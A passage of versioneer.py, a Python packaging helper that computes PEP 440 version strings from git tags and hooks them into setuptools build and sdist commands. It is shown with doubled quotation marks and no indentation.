if pieces[""distance""] or pieces[""dirty""]:
rendered += "".post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
else:
# exception #1
rendered = ""0.post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
return rendered
def render_git_describe(pieces):
""""""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])
else:
# exception #1
rendered = pieces[""short""]
if pieces[""dirty""]:
rendered += ""-dirty""
return rendered
def render_git_describe_long(pieces):
""""""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])
else:
# exception #1
rendered = pieces[""short""]
if pieces[""dirty""]:
rendered += ""-dirty""
return rendered
def add_one_to_version(version_string, number_index_to_increment=-1):
""""""
Add one to a version string at the given numeric indices.
>>> add_one_to_version('v1.2.3')
'v1.2.4'
""""""
# Break up the tag by number groups (preserving multi-digit
# numbers as multidigit)
parts = re.split(""([0-9]+)"", version_string)
digit_parts = [(i, part) for i, part in enumerate(parts)
if part.isdigit()]
# Deal with negative indexing.
increment_at_index = ((number_index_to_increment + len(digit_parts))
%% len(digit_parts))
for n_seen, (i, part) in enumerate(digit_parts):
if n_seen == increment_at_index:
parts[i] = str(int(part) + 1)
elif n_seen > increment_at_index:
parts[i] = '0'
return ''.join(parts)
def render_pep440_branch_based(pieces):
# [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is
# included for dirty.
# exceptions:
# 1: no tags. 0.0.0.devDISTANCE[+gHEX]
replacements = {' ': '.', '(': '', ')': ''}
[branch_name] = [pieces.get('branch').replace(old, new)
for old, new in replacements.items()]
master = branch_name == 'master'
maint = re.match(default_maint_branch_regexp,
branch_name or '')
# If we are on a tag, just pep440-pre it.
if pieces[""closest-tag""] and not (pieces[""distance""] or
pieces[""dirty""]):
rendered = pieces[""closest-tag""]
else:
# Put a default closest-tag in.
if not pieces[""closest-tag""]:
pieces[""closest-tag""] = '0.0.0'
if pieces[""distance""] or pieces[""dirty""]:
if maint:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += "".post%%d"" %% pieces[""distance""]
else:
rendered = add_one_to_version(pieces[""closest-tag""])
if pieces[""distance""]:
rendered += "".dev%%d"" %% pieces[""distance""]
suffix = []
# Put the branch name in if it isn't master nor a
# maintenance branch.
if not (master or maint):
suffix.append('%%s' %% (branch_name or 'unknown_branch'))
if pieces[""dirty""]:
suffix.append('g%%s' %% pieces[""short""])
rendered += '+%%s' %% ''.join(suffix)
else:
rendered = pieces[""closest-tag""]
return rendered
STYLES = {'default': render_pep440,
'pep440': render_pep440,
'pep440-pre': render_pep440_pre,
'pep440-post': render_pep440_post,
'pep440-old': render_pep440_old,
'git-describe': render_git_describe,
'git-describe-long': render_git_describe_long,
'pep440-old': render_pep440_old,
'pep440-branch-based': render_pep440_branch_based,
}
def render(pieces, style):
""""""Render the given version pieces into the requested style.""""""
if pieces[""error""]:
return {""version"": ""unknown"",
""full-revisionid"": pieces.get(""long""),
""dirty"": None,
""error"": pieces[""error""]}
if not style:
style = 'default'
renderer = STYLES.get(style)
if not renderer:
raise ValueError(""unknown style '%%s'"" %% style)
rendered = renderer(pieces)
return {""version"": rendered, ""full-revisionid"": pieces[""long""],
""dirty"": pieces[""dirty""], ""error"": None}
def get_versions():
""""""Get version information or return default if unable to do so.""""""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {""version"": ""0+unknown"", ""full-revisionid"": None,
""dirty"": None,
""error"": ""unable to find root of source tree""}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {""version"": ""0+unknown"", ""full-revisionid"": None,
""dirty"": None,
""error"": ""unable to compute version""}
'''
@register_vcs_handler(""git"", ""get_keywords"")
def git_get_keywords(versionfile_abs):
""""""Extract version information from the given file.""""""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, ""r"")
for line in f.readlines():
if line.strip().startswith(""git_refnames =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""refnames""] = mo.group(1)
if line.strip().startswith(""git_full =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""full""] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler(""git"", ""keywords"")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
""""""Get version information from git keywords.""""""
if not keywords:
raise NotThisMethod(""no keywords at all, weird"")
refnames = keywords[""refnames""].strip()
if refnames.startswith(""$Format""):
if verbose:
print(""keywords are unexpanded, not using"")
raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")
refs = [r.strip() for r in refnames.strip(""()"").split("","")]
# starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of
# just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.
TAG = ""tag: ""
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like ""release"" and
# ""stabilization"", as well as ""HEAD"" and ""master"".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print(""discarding '%s', no digits"" % "","".join(set(refs) - tags))
if verbose:
print(""likely tags: %s"" % "","".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. ""2.0"" over ""2.0rc1""
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print(""picking %s"" % r)
return {""version"": r,
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": None, ""branch"": None
}
# no suitable tags, so version is ""0+unknown"", but full hex is still there
if verbose:
print(""no suitable tags, using unknown + full revision id"")
return {""version"": ""0+unknown"",
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": ""no suitable tags"",
""branch"": None}
@register_vcs_handler(""git"", ""pieces_from_vcs"")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
""""""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
""""""
if not os.path.exists(os.path.join(root, "".git"")):
if verbose:
print(""no .git in %s"" % root)
raise NotThisMethod(""no .git directory"")
GITS = [""git""]
if sys.platform == ""win32"":
GITS = [""git.cmd"", ""git.exe""]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7
# and below, it is necessary to run ""git update-index --refresh"" first.
describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",
""--always"", ""--long"",
""--match"", ""%s*"" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod(""'git describe' failed"")
describe_out = describe_out.strip()
full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)
if full_out is None:
raise NotThisMethod(""'git rev-parse' failed"")
full_out = full_out.strip()
pieces = {}
pieces[""long""] = full_out
pieces[""short""] = full_out[:7] # maybe improved later
pieces[""error""] = None
# abbrev-ref available with git >= 1.7
branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],
cwd=root).strip()
if branch_name == 'HEAD':
branches = run_command(GITS, [""branch"", ""--contains""],
cwd=root).split('\n')
branches = [branch[2:] for branch in branches if branch[4:5] != '(']
if 'master' in branches:
branch_name = 'master'
elif not branches:
branch_name = None
else:
# Pick the first branch that is returned. Good or bad.
branch_name = branches[0]
pieces['branch'] = branch_name
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith(""-dirty"")
pieces[""dirty""] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex(""-dirty"")]
# now we have TAG-NUM-gHEX or HEX
if ""-"" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces[""error""] = (""unable to parse git-describe output: '%s'""
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = ""tag '%s' doesn't start with prefix '%s'""
print(fmt % (full_tag, tag_prefix))
pieces[""error""] = (""tag '%s' doesn't start with prefix '%s'""
% (full_tag, tag_prefix))
return pieces
pieces[""closest-tag""] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces[""distance""] = int(mo.group(2))
# commit: short hex revision ID
pieces[""short""] = mo.group(3)
else:
# HEX: no tags
pieces[""closest-tag""] = None
count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],
cwd=root)
pieces[""distance""] = int(count_out) # total number of commits
return pieces
def do_vcs_install(manifest_in, versionfile_source, ipy):
""""""Git-specific installation logic for Versioneer.
For Git, this means creating/changing .gitattributes to mark _version.py
for export-time keyword substitution.
""""""
GITS = [""git""]
if sys.platform == ""win32"":
GITS = [""git.cmd"", ""git.exe""]
files = [manifest_in, versionfile_source]
if ipy:
files.append(ipy)
try:
me = __file__
if me.endswith("".pyc"") or me.endswith("".pyo""):
me = os.path.splitext(me)[0] + "".py""
versioneer_file = os.path.relpath(me)
except NameError:
versioneer_file = ""versioneer.py""
files.append(versioneer_file)
present = False
try:
f = open("".gitattributes"", ""r"")
for line in f.readlines():
if line.strip().startswith(versionfile_source):
if ""export-subst"" in line.strip().split()[1:]:
present = True
f.close()
except EnvironmentError:
pass
if not present:
f = open("".gitattributes"", ""a+"")
f.write(""%s export-subst\n"" % versionfile_source)
f.close()
files.append("".gitattributes"")
run_command(GITS, [""add"", ""--""] + files)
def versions_from_parentdir(parentdir_prefix, root, verbose):
""""""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
""""""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print(""guessing rootdir is '%s', but '%s' doesn't start with ""
""prefix '%s'"" % (root, dirname, parentdir_prefix))
raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"")
return {""version"": dirname[len(parentdir_prefix):],
""full-revisionid"": None,
""dirty"": False, ""error"": None}
SHORT_VERSION_PY = """"""
# This file was generated by 'versioneer.py' (0.15+dev) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
import sys
version_json = '''
%s
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
""""""
def versions_from_file(filename):
""""""Try to determine the version from _version.py if present.""""""
try:
with open(filename) as f:
contents = f.read()
except EnvironmentError:
raise NotThisMethod(""unable to read _version.py"")
mo = re.search(r""version_json = '''\n(.*)''' # END VERSION_JSON"",
contents, re.M | re.S)
if not mo:
raise NotThisMethod(""no version_json in _version.py"")
return json.loads(mo.group(1))
def write_to_version_file(filename, versions):
""""""Write the given version number to the given _version.py file.""""""
os.unlink(filename)
contents = json.dumps(versions, sort_keys=True,
indent=1, separators=("","", "": ""))
with open(filename, ""w"") as f:
f.write(SHORT_VERSION_PY % contents)
print(""set %s to '%s'"" % (filename, versions[""version""]))
# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.
default_maint_branch_regexp = "".*([0-9]+\.)+x$""
def plus_or_dot(pieces):
""""""Return a + if we don't already have one, else return a .""""""
if ""+"" in pieces.get(""closest-tag"", """"):
return "".""
return ""+""
def render_pep440(pieces):
""""""Build up version string, with post-release ""local version identifier"".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += plus_or_dot(pieces)
rendered += ""%d.g%s"" % (pieces[""distance""], pieces[""short""])
if pieces[""dirty""]:
rendered += "".dirty""
else:
# exception #1
rendered = ""0+untagged.%d.g%s"" % (pieces[""distance""],
pieces[""short""])
if pieces[""dirty""]:
rendered += "".dirty""
return rendered
def render_pep440_pre(pieces):
""""""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += "".post.dev%d"" % pieces[""distance""]
else:
# exception #1
rendered = ""0.post.dev%d"" % pieces[""distance""]
return rendered
def render_pep440_post(pieces):
""""""TAG[.postDISTANCE[.dev0]+gHEX] .
The "".dev0"" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear ""older"" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += "".post%d"" % pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
rendered += plus_or_dot(pieces)
rendered += ""g%s"" % pieces[""short""]
else:
# exception #1
rendered = ""0.post%d"" % pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
rendered += ""+g%s"" % pieces[""short""]
return rendered
def render_pep440_old(pieces):
""""""TAG[.postDISTANCE[.dev0]] .
The "".dev0"" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += "".post%d"" % pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
else:
# exception #1
rendered = ""0.post%d"" % pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
return rendered
def render_git_describe(pieces):
""""""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])
else:
# exception #1
rendered = pieces[""short""]
if pieces[""dirty""]:
rendered += ""-dirty""
return rendered
def render_git_describe_long(pieces):
""""""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])
else:
# exception #1
rendered = pieces[""short""]
if pieces[""dirty""]:
rendered += ""-dirty""
return rendered
def add_one_to_version(version_string, number_index_to_increment=-1):
""""""
Add one to a version string at the given numeric indices.
>>> add_one_to_version('v1.2.3')
'v1.2.4'
""""""
# Break up the tag by number groups (preserving multi-digit
# numbers as multidigit)
parts = re.split(""([0-9]+)"", version_string)
digit_parts = [(i, part) for i, part in enumerate(parts)
if part.isdigit()]
# Deal with negative indexing.
increment_at_index = ((number_index_to_increment + len(digit_parts))
% len(digit_parts))
for n_seen, (i, part) in enumerate(digit_parts):
if n_seen == increment_at_index:
parts[i] = str(int(part) + 1)
elif n_seen > increment_at_index:
parts[i] = '0'
return ''.join(parts)
def render_pep440_branch_based(pieces):
# [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is
# included for dirty.
# exceptions:
# 1: no tags. 0.0.0.devDISTANCE[+gHEX]
replacements = {' ': '.', '(': '', ')': ''}
branch_name = pieces.get('branch')
for old, new in replacements.items():
branch_name = branch_name.replace(old, new)
master = branch_name == 'master'
maint = re.match(default_maint_branch_regexp,
branch_name or '')
# If we are on a tag, just pep440-pre it.
if pieces[""closest-tag""] and not (pieces[""distance""] or
pieces[""dirty""]):
rendered = pieces[""closest-tag""]
else:
# Put a default closest-tag in.
if not pieces[""closest-tag""]:
pieces[""closest-tag""] = '0.0.0'
if pieces[""distance""] or pieces[""dirty""]:
if maint:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += "".post%d"" % pieces[""distance""]
else:
rendered = add_one_to_version(pieces[""closest-tag""])
if pieces[""distance""]:
rendered += "".dev%d"" % pieces[""distance""]
suffix = []
# Put the branch name in if it isn't master nor a
# maintenance branch.
if not (master or maint):
suffix.append('%s' % (branch_name or 'unknown_branch'))
if pieces[""dirty""]:
suffix.append('g%s' % pieces[""short""])
rendered += '+%s' % ''.join(suffix)
else:
rendered = pieces[""closest-tag""]
return rendered
STYLES = {'default': render_pep440,
'pep440': render_pep440,
'pep440-pre': render_pep440_pre,
'pep440-post': render_pep440_post,
'pep440-old': render_pep440_old,
'git-describe': render_git_describe,
'git-describe-long': render_git_describe_long,
'pep440-old': render_pep440_old,
'pep440-branch-based': render_pep440_branch_based,
}
def render(pieces, style):
""""""Render the given version pieces into the requested style.""""""
if pieces[""error""]:
return {""version"": ""unknown"",
""full-revisionid"": pieces.get(""long""),
""dirty"": None,
""error"": pieces[""error""]}
if not style:
style = 'default'
renderer = STYLES.get(style)
if not renderer:
raise ValueError(""unknown style '%s'"" % style)
rendered = renderer(pieces)
return {""version"": rendered, ""full-revisionid"": pieces[""long""],
""dirty"": pieces[""dirty""], ""error"": None}
class VersioneerBadRootError(Exception):
""""""The project root directory is unknown or missing key files.""""""
def get_versions(verbose=False):
""""""Get the project version from whatever source is available.
Returns dict with two keys: 'version' and 'full'.
""""""
if ""versioneer"" in sys.modules:
# see the discussion in cmdclass.py:get_cmdclass()
del sys.modules[""versioneer""]
root = get_root()
cfg = get_config_from_root(root)
assert cfg.VCS is not None, ""please set [versioneer]VCS= in setup.cfg""
handlers = HANDLERS.get(cfg.VCS)
assert handlers, ""unrecognized VCS '%s'"" % cfg.VCS
verbose = verbose or cfg.verbose
assert cfg.versionfile_source is not None, \
""please set versioneer.versionfile_source""
assert cfg.tag_prefix is not None, ""please set versioneer.tag_prefix""
versionfile_abs = os.path.join(root, cfg.versionfile_source)
# extract version from first of: _version.py, VCS command (e.g. 'git
# describe'), parentdir. This is meant to work for developers using a
# source checkout, for users of a tarball created by 'setup.py sdist',
# and for users of a tarball/zipball created by 'git archive' or github's
# download-from-tag feature or the equivalent in other VCSes.
get_keywords_f = handlers.get(""get_keywords"")
from_keywords_f = handlers.get(""keywords"")
if get_keywords_f and from_keywords_f:
try:
keywords = get_keywords_f(versionfile_abs)
ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
if verbose:
print(""got version from expanded keyword %s"" % ver)
return ver
except NotThisMethod:
pass
try:
ver = versions_from_file(versionfile_abs)
if verbose:
print(""got version from file %s %s"" % (versionfile_abs, ver))
return ver
except NotThisMethod:
pass
from_vcs_f = handlers.get(""pieces_from_vcs"")
if from_vcs_f:
try:
pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
ver = render(pieces, cfg.style)
if verbose:
print(""got version from VCS %s"" % ver)
return ver
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
if verbose:
print(""got version from parentdir %s"" % ver)
return ver
except NotThisMethod:
pass
if verbose:
print(""unable to compute version"")
return {""version"": ""0+unknown"", ""full-revisionid"": None,
""dirty"": None, ""error"": ""unable to compute version""}
def get_version():
""""""Get the short version string for this project.""""""
return get_versions()[""version""]
def get_cmdclass():
""""""Get the custom setuptools/distutils subclasses used by Versioneer.""""""
if ""versioneer"" in sys.modules:
del sys.modules[""versioneer""]
# this fixes the ""python setup.py develop"" case (also 'install' and
# 'easy_install .'), in which subdependencies of the main project are
# built (using setup.py bdist_egg) in the same python process. Assume
# a main project A and a dependency B, which use different versions
# of Versioneer. A's setup.py imports A's Versioneer, leaving it in
# sys.modules by the time B's setup.py is executed, causing B to run
# with the wrong versioneer. Setuptools wraps the sub-dep builds in a
# sandbox that restores sys.modules to it's pre-build state, so the
# parent is protected against the child's ""import versioneer"". By
# removing ourselves from sys.modules here, before the child build
# happens, we protect the child from the parent's versioneer too.
# Also see https://github.com/warner/python-versioneer/issues/52
cmds = {}
# we add ""version"" to both distutils and setuptools
from distutils.core import Command
class cmd_version(Command):
description = ""report generated version string""
user_options = []
boolean_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
vers = get_versions(verbose=True)
print(""Version: %s"" % vers[""version""])
print("" full-revisionid: %s"" % vers.get(""full-revisionid""))
print("" dirty: %s"" % vers.get(""dirty""))
if vers[""error""]:
print("" error: %s"" % vers[""error""])
cmds[""version""] = cmd_version
# we override ""build_py"" in both distutils and setuptools
#
# most invocation pathways end up running build_py:
# distutils/build -> build_py
# distutils/install -> distutils/build ->..
# setuptools/bdist_wheel -> distutils/install ->..
# setuptools/bdist_egg -> distutils/install_lib -> build_py
# setuptools/install -> bdist_egg ->..
# setuptools/develop -> ?
# we override different ""build_py"" commands for both environments
if ""setuptools"" in sys.modules:
from setuptools.command.build_py import build_py as _build_py
else:
from distutils.command.build_py import build_py as _build_py
class cmd_build_py(_build_py):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
_build_py.run(self)
# now locate _version.py in the new build/ directory and replace
# it with an updated value
if cfg.versionfile_build:
target_versionfile = os.path.join(self.build_lib,
cfg.versionfile_build)
print(""UPDATING %s"" % target_versionfile)
write_to_version_file(target_versionfile, versions)
cmds[""build_py""] = cmd_build_py
if ""cx_Freeze"" in sys.modules: # cx_freeze enabled?
from cx_Freeze.dist import build_exe as _build_exe
class cmd_build_exe(_build_exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print(""UPDATING %s"" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_build_exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, ""w"") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{""DOLLAR"": ""$"",
""STYLE"": cfg.style,
""TAG_PREFIX"": cfg.tag_prefix,
""PARENTDIR_PREFIX"": cfg.parentdir_prefix,
""VERSIONFILE_SOURCE"": cfg.versionfile_source,
})
cmds[""build_exe""] = cmd_build_exe
del cmds[""build_py""]
# we override different ""sdist"" commands for both environments
if ""setuptools"" in sys.modules:
from setuptools.command.sdist import sdist as _sdist
else:
from distutils.command.sdist import sdist as _sdist
class cmd_sdist(_sdist):
def run(self):
versions = get_versions()
self._versioneer_generated_versions = versions
# unless we update this, the command will keep using the old
# version
self.distribution.metadata.version = versions[""version""]
return _sdist.run(self)
def make_release_tree(self, base_dir, files):
root = get_root()
cfg = get_config_from_root(root)
_sdist.make_release_tree(self, base_dir, files)
# now locate _version.py in the new base_dir directory
# (remembering that it may be a hardlink) and replace it with an
# updated value
target_versionfile = os.path.join(base_dir, cfg.versionfile_source)
print(""UPDATING %s"" % target_versionfile)
write_to_version_file(target_versionfile,
self._versioneer_generated_versions)
cmds[""sdist""] = cmd_sdist
return cmds
CONFIG_ERROR = """"""
setup.cfg is missing the necessary Versioneer configuration. You need
a section like:
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
You will also need to edit your setup.py to use the results:
import versioneer
setup(version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(), ...)
Please read the docstring in ./versioneer.py for configuration instructions,
edit setup.cfg, and re-run the installer or 'python versioneer.py setup'.
""""""
SAMPLE_CONFIG = """"""
# See the docstring in versioneer.py for instructions. Note that you must
# re-run 'versioneer.py setup' after changing this section, and commit the
# resulting files.
[versioneer]
#VCS = git
#style = pep440
#versionfile_source =
#versionfile_build =
#tag_prefix =
#parentdir_prefix =
""""""
INIT_PY_SNIPPET = """"""
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
""""""
def do_setup():
""""""Main VCS-independent setup function for installing Versioneer.""""""
root = get_root()
try:
cfg = get_config_from_root(root)
except (EnvironmentError, configparser.NoSectionError,
configparser.NoOptionError) as e:
if isinstance(e, (EnvironmentError, configparser.NoSectionError)):
print(""Adding sample versioneer config to setup.cfg"",
file=sys.stderr)
with open(os.path.join(root, ""setup.cfg""), ""a"") as f:
f.write(SAMPLE_CONFIG)
print(CONFIG_ERROR, file=sys.stderr)
return 1
print("" creating %s"" % cfg.versionfile_source)
with open(cfg.versionfile_source, ""w"") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG % {""DOLLAR"": ""$"",
""STYLE"": cfg.style,
""TAG_PREFIX"": cfg.tag_prefix,
""PARENTDIR_PREFIX"": cfg.parentdir_prefix,
""VERSIONFILE_SOURCE"": cfg.versionfile_source,
})
ipy = os.path.join(os.path.dirname(cfg.versionfile_source),
""__init__.py"")
if os.path.exists(ipy):
try:
with open(ipy, ""r"") as f:
old = f.read()
except EnvironmentError:
old = """"
if INIT_PY_SNIPPET not in old:
print("" appending to %s"" % ipy)
with open(ipy, ""a"") as f:
f.write(INIT_PY_SNIPPET)
else:
print("" %s unmodified"" % ipy)
else:
print("" %s doesn't exist, ok"" % ipy)
ipy = None
# Make sure both the top-level ""versioneer.py"" and versionfile_source
# (PKG/_version.py, used by runtime code) are in MANIFEST.in, so
# they'll be copied into source distributions. Pip won't be able to
# install the package without this.
manifest_in = os.path.join(root, ""MANIFEST.in"")
simple_includes = set()
try:
with open(manifest_in, ""r"") as f:
for line in f:
if line.startswith(""include ""):
for include in line.split()[1:]:
simple_includes.add(include)
except EnvironmentError:
pass
# That doesn't cover everything MANIFEST.in can do
# (http://docs.python.org/2/distutils/sourcedist.html#commands), so
# it might give some false negatives. Appending redundant 'include'
# lines is safe, though.
if ""versioneer.py"" not in simple_includes:
print("" appending 'versioneer.py' to MANIFEST.in"")
with open(manifest_in, ""a"") as f:
f.write(""include versioneer.py\n"")
else:
print("" 'versioneer.py' already in MANIFEST.in"")
if cfg.versionfile_source not in simple_includes:
print("" appending versionfile_source ('%s') to MANIFEST.in"" %
cfg.versionfile_source)
with open(manifest_in, ""a"") as f:
f.write(""include %s\n"" % cfg.versionfile_source)
else:
print("" versionfile_source already in MANIFEST.in"")
# Make VCS-specific changes. For git, this means creating/changing
# .gitattributes to mark _version.py for export-time keyword
# substitution.
do_vcs_install(manifest_in, cfg.versionfile_source, ipy)
return 0
def scan_setup_py():
""""""Validate the contents of setup.py against Versioneer's expectations.""""""
found = set()
setters = False
errors = 0
with open(""setup.py"", ""r"") as f:
for line in f.readlines():
if ""import versioneer"" in line:
found.add(""import"")
if ""versioneer.get_cmdclass()"" in line:
found.add(""cmdclass"")
if ""versioneer.get_version()"" in line:
found.add(""get_version"")
if ""versioneer.VCS"" in line:
setters = True
if ""versioneer.versionfile_source"" in line:
setters = True
if len(found) != 3:
print("""")
print(""Your setup.py appears to be missing some important items"")
print(""(but I might be wrong). Please make sure it has something"")
print(""roughly like the following:"")
print("""")
print("" import versioneer"")
print("" setup( version=versioneer.get_version(),"")
print("" cmdclass=versioneer.get_cmdclass(), ...)"")
print("""")
errors += 1
if setters:
print(""You should remove lines like 'versioneer.VCS = ' and"")
print(""'versioneer.versionfile_source = ' . This configuration"")
print(""now lives in setup.cfg, and should be removed from setup.py"")
print("""")
errors += 1
return errors
if __name__ == ""__main__"":
cmd = sys.argv[1]
if cmd == ""setup"":
errors = do_setup()
errors += scan_setup_py()
if errors:
sys.exit(1)
